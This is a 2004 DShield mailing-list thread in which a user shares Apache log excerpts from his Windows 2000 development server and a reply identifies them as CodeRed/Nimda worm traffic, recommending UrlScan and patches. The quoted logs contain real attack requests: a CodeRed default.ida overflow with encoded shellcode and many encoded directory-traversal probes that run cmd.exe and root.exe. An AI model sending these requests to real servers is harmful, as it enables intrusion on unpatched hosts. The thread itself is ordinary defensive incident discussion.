[Dshield] Suspect HTTP-activity

Doug White doug at clickdoug.com
Fri Jan 23 21:35:32 GMT 2004


looks like the signature of the CodeRed/Nimbda worm/virus

If you are running Win2k, make sure you have UrlScan installed, as well as all
patches/service packs.

======================================
Stop spam on your domain, Anti-spam solutions
http://www.clickdoug.com/mailfilter.cfm
For hosting solutions http://www.clickdoug.com
======================================
Aspire to Inspire before you Retire or Expire!


----- Original Message ----- 
From: "Martin Agren" <martin.agren at home.se>
To: <list at dshield.org>
Sent: Friday, January 23, 2004 12:30 PM
Subject: [Dshield] Suspect HTTP-activity


: Hello,
: I'm a fresh subscriber to this list and the very reason I stumbled upon
: it was that I was investigating some activity that apache logged and
: that made me a little supicious about the intentions behind the
: requests. So first of, Hello!
:
: I've been trying to go through the most recent archives and while what
: you discuss seems to be both interesting and important, I haven't found
: anything that match my query.
:
: If this is the wrong place for my question, I can take pointers to other
: lists/sites for an answer. :-)
:
: Below are excerpts from my apache/access.log (I'm running Win2000Pro). I
: haven't publicly announced my web-server in any way -- I just use it for
: development of web-code and invite other developers to check it out.
:
: Most of these logs seems to indicate nothing actually happened
: (404-status), but I'm curious as to what it's all about and if anyone
: might be interested in this information. Any DShield-like service that
: collects apache-logs? ;-)
:
: Most of these requests seems to be someone wanting to list my disk.
:
: Are there any known worms that create these requests? Should I act in
: any way?
:
: Any help is much appreciated!
:
: If anyone wants me to post more logs, I can do so (it's basically just
: the same requests a couple of times)
:
: Martin
:
: 218.11.129.221 - - [20/Jan/2004:11:22:29 +0100] "GET
:
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9
090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u909
0%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
: HTTP/1.0" 404 308
: 127.0.0.1 - - [20/Jan/2004:12:56:23 +0100] "GET /default.ida HTTP/1.1"
: 404 320
: 210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET
: /scripts/nsiislog.dll" 404 -
: 202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200 1916
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /scripts/root.exe?/c+dir HTTP/1.0" 404 307
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /MSADC/root.exe?/c+dir HTTP/1.0" 404 305
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
: HTTP/1.0" 404 346
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
: HTTP/1.0" 404 346
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
:
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
32/cmd.exe?/c+dir
: HTTP/1.0" 404 362
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
:
: _______________________________________________
: list mailing list
: list at dshield.org
: To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
:
:




More information about the list mailing list